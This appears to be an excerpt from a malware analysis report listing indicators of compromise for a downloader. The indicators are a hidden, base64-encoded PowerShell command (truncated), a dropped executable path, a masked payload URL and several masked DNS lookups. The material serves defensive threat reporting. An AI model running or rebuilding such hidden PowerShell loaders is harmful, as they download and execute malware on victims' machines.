Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAGoAeQBvAHgAagByAHUAcQBjAGsAagA9ACcASABpAHMAYgBqAG0AZQB1AGQAZwBmAGwAJwA7ACQAUAB6AGgAdQBhAGwAbwBnAG4AagBiAHcAbAAgAD0AIAAnADgAMQAwACcAOwAkAEEAZgBpAGgAZwBqAGk...
- %HOMEPATH%\810.exe
- http://de###s-roth.de/phpmaill/nvub-2hfx8k0-3184595/
- DNS ASK co###ltinghd.ge
- DNS ASK sp###traders.ch
- DNS ASK 1n##ah.net
- DNS ASK de###s-roth.de
- DNS ASK lu####ttours.com
- DNS ASK lu###etours.com